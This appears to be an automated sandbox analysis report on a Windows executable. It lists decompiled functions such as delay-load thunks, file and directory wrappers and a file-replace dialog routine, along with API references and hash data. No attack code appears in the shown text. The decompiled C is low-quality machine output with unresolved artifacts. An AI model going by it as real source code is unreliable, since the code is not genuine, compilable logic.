    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: b43aead1bb877a8f84f605a0ba4ad76d06dac945e10e2bb008d57647acbfa227
    • Instruction ID: 3fac2aad5a27861e6e630469f933f5c3d4a9339175cc7a74d85341697e694d7f
    • Opcode Fuzzy Hash: b43aead1bb877a8f84f605a0ba4ad76d06dac945e10e2bb008d57647acbfa227
    • Instruction Fuzzy Hash: 83B0129575930D7D71082144AD02C37010CF2C0B16332821BF161D1080EC845D441033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0084D289() {
    				void* _t3;
    				void* _t4;
    				void* _t8;
    				void* _t9;
    				void* _t10;
    
    				_push(_t4);
    				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac54, 0x86dffc); // executed
    				goto __eax;
    			}








    0x0084d264
    0x0084d26c
    0x0084d273

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D26C
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 8726009444e30efe39ec26ac69e04d0ea051183b1e78b06148da0a17b97afe2b
    • Instruction ID: 40e6b9aa4e0f2aee14b21b9ea87f7229e829dbfd474f031550b500654a0d82ac
    • Opcode Fuzzy Hash: 8726009444e30efe39ec26ac69e04d0ea051183b1e78b06148da0a17b97afe2b
    • Instruction Fuzzy Hash: E2B0128135C3196D710851481D02D36010CF1C4B1A332C11BF411C2140DC845C291033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0084D293() {
    				void* _t3;
    				void* _t4;
    				void* _t8;
    				void* _t9;
    				void* _t10;
    
    				_push(_t4);
    				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac54, 0x86dff0); // executed
    				goto __eax;
    			}








    0x0084d264
    0x0084d26c
    0x0084d273

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D26C
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 46e10047f2e682c3a5886c2e3ee12ab7d7515883030e6a52378797d0e3335604
    • Instruction ID: 0b1796f0aaf7762b37c3b88435c4dc3cbc1347c350a048b5e4542c6d2f97c6b9
    • Opcode Fuzzy Hash: 46e10047f2e682c3a5886c2e3ee12ab7d7515883030e6a52378797d0e3335604
    • Instruction Fuzzy Hash: F0B0128135C3096D710851491D02E36010CF1C4B1A332811BF011C2140DCC45C291033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0084D214() {
    				void* _t3;
    				void* _t4;
    				void* _t8;
    				void* _t9;
    				void* _t10;
    
    				_push(_t4);
    				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac34, 0x86df10); // executed
    				goto __eax;
    			}








    0x0084d203
    0x0084d20b
    0x0084d212

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D20B
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: afc590d2c40d2889619410825b9510ab79ef115cb6e04ad496af6583e2133269
    • Instruction ID: a3d9cd165629a3f95f97f92ad4f9b60572408e0f246f6504ae27ad2661bbd809
    • Opcode Fuzzy Hash: afc590d2c40d2889619410825b9510ab79ef115cb6e04ad496af6583e2133269
    • Instruction Fuzzy Hash: 40B012A575930D6D710851491D02D37010CF1C4B16332951BF121C1184ECC45C141033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0084D21E() {
    				void* _t3;
    				void* _t4;
    				void* _t8;
    				void* _t9;
    				void* _t10;
    
    				_push(_t4);
    				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac34, 0x86df0c); // executed
    				goto __eax;
    			}








    0x0084d203
    0x0084d20b
    0x0084d212

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D20B
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: f5d435fcb25005faf1b7028a0950038aedb704a67d77c19c6d8dd767c1b0f592
    • Instruction ID: b61445a13b68548c54aaeb28bec9265c068ba40424068d8c028463da206a0f0b
    • Opcode Fuzzy Hash: f5d435fcb25005faf1b7028a0950038aedb704a67d77c19c6d8dd767c1b0f592
    • Instruction Fuzzy Hash: BAB0129575930D6D710851481D02D37021CF1C4B16332C11BF521C2140ED845C041033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0084D232() {
    				void* _t3;
    				void* _t4;
    				void* _t8;
    				void* _t9;
    				void* _t10;
    
    				_push(_t4);
    				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac34, 0x86df04); // executed
    				goto __eax;
    			}








    0x0084d203
    0x0084d20b
    0x0084d212

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D20B
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: ea06b4c2bc54b0349cab7e97e78e76cec2b2ff1ec4d0ec03e5e6f5989066666e
    • Instruction ID: 46aee70826a5b83c4fcb242031356ee5a92cf94e4b12c7fe46f997cd2f64bdd8
    • Opcode Fuzzy Hash: ea06b4c2bc54b0349cab7e97e78e76cec2b2ff1ec4d0ec03e5e6f5989066666e
    • Instruction Fuzzy Hash: 94B0129575930D6D710851481E02D37010CF1C8B16332811BF121C2140EC855C051033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E0084D25A() {
    				void* _t3;
    				void* _t4;
    				void* _t8;
    				void* _t9;
    				void* _t10;
    
    				_push(_t4);
    				E0084D58F(_t3, _t4, _t8, _t9, _t10, 0x86ac54, 0x86dff8); // executed
    				goto __eax;
    			}








    0x0084d264
    0x0084d26c
    0x0084d273

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D26C
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: c55bd3cfb02389d5b09ad1f7c4eda31743b9a6441af0c9234cf71c145522417c
    • Instruction ID: 5f9bb52564b461ec604516258def535501ae8f1b769dc4c083bd57f9f3285102
    • Opcode Fuzzy Hash: c55bd3cfb02389d5b09ad1f7c4eda31743b9a6441af0c9234cf71c145522417c
    • Instruction Fuzzy Hash: A0B012C135C3097D710811451D02C36010CF2C0B1E332821BF021D10809C845C691433
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 22%
    			E0084D284() {
    				void* _t2;
    				void* _t3;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    
    				_push(0x86ac54); // executed
    				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
    				goto __eax;
    			}








    0x0084d267
    0x0084d26c
    0x0084d273

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D26C
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a5cc2df9f0ae81b8d9a1ea2b0f15ae644d3f1f2e16d08da894c87a9bd6f2f237
    • Instruction ID: d118b5e02f6a78512c48f78d0e6aafdd21c35933aaa242817c7f849bd292739f
    • Opcode Fuzzy Hash: a5cc2df9f0ae81b8d9a1ea2b0f15ae644d3f1f2e16d08da894c87a9bd6f2f237
    • Instruction Fuzzy Hash: F1A0128115C30A7C700811001D02C36010CE0C4B56331850AF011C1040588418251033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 22%
    			E0084D22D() {
    				void* _t2;
    				void* _t3;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    
    				_push(0x86ac34); // executed
    				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
    				goto __eax;
    			}








    0x0084d206
    0x0084d20b
    0x0084d212

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D20B
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 54f4234c0b6c5acb1233f7548a7b0b2592777eead7a01861d2359489feb613d6
    • Instruction ID: d8b362befab61a141cd4c6d12d88266e21273a247d59af3dd83c55bf28e9437f
    • Opcode Fuzzy Hash: 54f4234c0b6c5acb1233f7548a7b0b2592777eead7a01861d2359489feb613d6
    • Instruction Fuzzy Hash: 70A011AA2AA20EBCB00822002E02C3B020CE0C8B2A3328A0AF022C0080A88828002033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 22%
    			E0084D241() {
    				void* _t2;
    				void* _t3;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    
    				_push(0x86ac34); // executed
    				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
    				goto __eax;
    			}








    0x0084d206
    0x0084d20b
    0x0084d212

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D20B
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0bedfbe3455bf72b89fa923423a6f075349c365bbca88c12ee6f5b3444fa9d7c
    • Instruction ID: d8b362befab61a141cd4c6d12d88266e21273a247d59af3dd83c55bf28e9437f
    • Opcode Fuzzy Hash: 0bedfbe3455bf72b89fa923423a6f075349c365bbca88c12ee6f5b3444fa9d7c
    • Instruction Fuzzy Hash: 70A011AA2AA20EBCB00822002E02C3B020CE0C8B2A3328A0AF022C0080A88828002033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 22%
    			E0084D24B() {
    				void* _t2;
    				void* _t3;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    
    				_push(0x86ac34); // executed
    				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
    				goto __eax;
    			}








    0x0084d206
    0x0084d20b
    0x0084d212

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D20B
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 374dd894490a557a23677faa24d4a76335171c0f0a7c4d084cc1a37b9f0c89cd
    • Instruction ID: d8b362befab61a141cd4c6d12d88266e21273a247d59af3dd83c55bf28e9437f
    • Opcode Fuzzy Hash: 374dd894490a557a23677faa24d4a76335171c0f0a7c4d084cc1a37b9f0c89cd
    • Instruction Fuzzy Hash: 70A011AA2AA20EBCB00822002E02C3B020CE0C8B2A3328A0AF022C0080A88828002033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 22%
    			E0084D255() {
    				void* _t2;
    				void* _t3;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    
    				_push(0x86ac34); // executed
    				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
    				goto __eax;
    			}








    0x0084d206
    0x0084d20b
    0x0084d212

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D20B
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: edefa928c978dd0a4a934005aafabf3f9510cd27b5b5857ed843681eed6fa4f1
    • Instruction ID: d8b362befab61a141cd4c6d12d88266e21273a247d59af3dd83c55bf28e9437f
    • Opcode Fuzzy Hash: edefa928c978dd0a4a934005aafabf3f9510cd27b5b5857ed843681eed6fa4f1
    • Instruction Fuzzy Hash: 70A011AA2AA20EBCB00822002E02C3B020CE0C8B2A3328A0AF022C0080A88828002033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 22%
    			E0084D27A() {
    				void* _t2;
    				void* _t3;
    				void* _t6;
    				void* _t7;
    				void* _t8;
    
    				_push(0x86ac54); // executed
    				E0084D58F(_t2, _t3, _t6, _t7, _t8); // executed
    				goto __eax;
    			}








    0x0084d267
    0x0084d26c
    0x0084d273

    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 0084D26C
      • Part of subcall function 0084D58F: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0084D60C
      • Part of subcall function 0084D58F: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0084D61D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0f3ce0a9e2265573c5c9df8fc4dd1b8e6365954682be68e205ca0af025445fec
    • Instruction ID: d118b5e02f6a78512c48f78d0e6aafdd21c35933aaa242817c7f849bd292739f
    • Opcode Fuzzy Hash: 0f3ce0a9e2265573c5c9df8fc4dd1b8e6365954682be68e205ca0af025445fec
    • Instruction Fuzzy Hash: F1A0128115C30A7C700811001D02C36010CE0C4B56331850AF011C1040588418251033
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E00839C7A(void* __ecx) {
    				int _t2;
    
    				_t2 = SetEndOfFile( *(__ecx + 4)); // executed
    				asm("sbb eax, eax");
    				return  ~(_t2 - 1) + 1;
    			}




    0x00839c7d
    0x00839c86
    0x00839c89

    APIs
    • SetEndOfFile.KERNELBASE(?,00838FCB,?,?,-00001960), ref: 00839C7D
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: File
    • String ID:
    • API String ID: 749574446-0
    • Opcode ID: c9a67737b5636668dfe556cf10a2eab458f0744a770aec2a15b0ae24c0f5a0c3
    • Instruction ID: db86e081319f3c4749df34a84ffe0bc3464952564d449f6d182e1798e6d83c01
    • Opcode Fuzzy Hash: c9a67737b5636668dfe556cf10a2eab458f0744a770aec2a15b0ae24c0f5a0c3
    • Instruction Fuzzy Hash: 22B012300A4805468E012B34CD044143A11F61130A30151A0A002C5060CB12C0039600
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 58%
    			E00849B00(WCHAR* _a4) {
    				signed int _t2;
    
    				_t2 = SetCurrentDirectoryW(_a4); // executed
    				asm("sbb eax, eax");
    				return  ~( ~_t2);
    			}




    0x00849b04
    0x00849b0c
    0x00849b10

    APIs
    • SetCurrentDirectoryW.KERNELBASE(?,00849D57,C:\Users\user\Desktop,00000000,008785FA,00000006), ref: 00849B04
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CurrentDirectory
    • String ID:
    • API String ID: 1611563598-0
    • Opcode ID: 1e45cdd502b499a69e1f9a822e3023f5d88f3b7fc8fd3ce3a5cc1aa7c181c00d
    • Instruction ID: 7b3b60eeaf509770560c82da18b863e7b98996e5b508519dff3a11cabcc80440
    • Opcode Fuzzy Hash: 1e45cdd502b499a69e1f9a822e3023f5d88f3b7fc8fd3ce3a5cc1aa7c181c00d
    • Instruction Fuzzy Hash: BDA01230198006478A000B30CC09C1576516761702F019620B102C00A0CB30C820A500
    Uniqueness

    Uniqueness Score: -1.00%

    Non-executed Functions

    C-Code - Quality: 60%
    			E0084B014(void* __ecx, void* __edx, void* __eflags, char _a4, short _a8, char _a12, short _a108, short _a112, char _a192, char _a212, struct _WIN32_FIND_DATAW _a288, signed char _a304, signed char _a308, struct _FILETIME _a332, intOrPtr _a340, intOrPtr _a344, short _a884, short _a896, short _a900, int _a1904, char _a1924, int _a1928, short _a2596, short _a2616, char _a2628, char _a2640, struct HWND__* _a6740, intOrPtr _a6744, signed short _a6748, intOrPtr _a6752) {
    				struct _FILETIME _v0;
    				struct _SYSTEMTIME _v12;
    				struct _SYSTEMTIME _v16;
    				struct _FILETIME _v24;
    				void* _t73;
    				void* _t136;
    				long _t137;
    				void* _t141;
    				void* _t142;
    				void* _t143;
    				void* _t144;
    				void* _t145;
    				signed short _t148;
    				intOrPtr _t152;
    				signed int _t153;
    				signed int _t157;
    				struct HWND__* _t159;
    				intOrPtr _t162;
    				void* _t163;
    				int _t166;
    				int _t169;
    				void* _t173;
    				void* _t177;
    				void* _t179;
    
    				_t156 = __edx;
    				E0084D9C0();
    				_t148 = _a6748;
    				_t162 = _a6744;
    				_t159 = _a6740;
    				if(E008312D7(__edx, _t159, _t162, _t148, _a6752, L"REPLACEFILEDLG", 0, 0) == 0) {
    					_t163 = _t162 - 0x110;
    					if(_t163 == 0) {
    						SetFocus(GetDlgItem(_t159, 0x6c));
    						E0083FAE7( &_a2640, _a6752, 0x800);
    						E0083BAB6( &_a2628,  &_a2628, 0x800);
    						SetDlgItemTextW(_t159, 0x65,  &_a2616);
    						 *0x86df00( &_a2616, 0,  &_a1924, 0x2b4, 0x100);
    						SendDlgItemMessageW(_t159, 0x66, 0x170, _a1904, 0);
    						_t173 = FindFirstFileW( &_a2596,  &_a288);
    						if(_t173 != 0xffffffff) {
    							FileTimeToLocalFileTime( &_a332,  &(_v24.dwHighDateTime));
    							FileTimeToSystemTime( &(_v24.dwHighDateTime),  &_v12);
    							_push(0x32);
    							_push( &_a12);
    							_push(0);
    							_push( &_v12);
    							_t166 = 2;
    							GetTimeFormatW(0x400, 0x800, ??, ??, ??, ??);
    							GetDateFormatW(0x400, 0,  &_v12, 0,  &_a112, 0x32);
    							_push( &_a12);
    							_push( &_a112);
    							E00833F53( &_a900, 0x200, L"%s %s %s", E0083DA8B(0x99));
    							_t179 = _t177 + 0x18;
    							SetDlgItemTextW(_t159, 0x6a,  &_a900);
    							FindClose(_t173);
    							if((_a308 & 0x00000010) == 0) {
    								_push(0x32);
    								_push( &_a212);
    								_push(0);
    								_pop(0);
    								asm("adc eax, ebp");
    								_push(_a340);
    								_push(0 + _a344);
    								E00849E0C();
    								_push(E0083DA8B(0x98));
    								E00833F53( &_a884, 0x200, L"%s %s",  &_a192);
    								_t179 = _t179 + 0x14;
    								SetDlgItemTextW(_t159, 0x68,  &_a884);
    							}
    							SendDlgItemMessageW(_t159, 0x67, 0x170, _a1928, 0);
    							_t152 =  *0x8775f4; // 0x0
    							E00840857(_t152, _t156,  &_a4);
    							FileTimeToLocalFileTime( &_v0,  &_v24);
    							FileTimeToSystemTime( &_v24,  &_v16);
    							GetTimeFormatW(0x400, _t166,  &_v16, 0,  &_a8, 0x32);
    							GetDateFormatW(0x400, 0,  &_v16, 0,  &_a108, 0x32);
    							_push( &_a8);
    							_push( &_a108);
    							E00833F53( &_a896, 0x200, L"%s %s %s", E0083DA8B(0x99));
    							_t177 = _t179 + 0x18;
    							SetDlgItemTextW(_t159, 0x6b,  &_a896);
    							_t153 =  *0x88ce14;
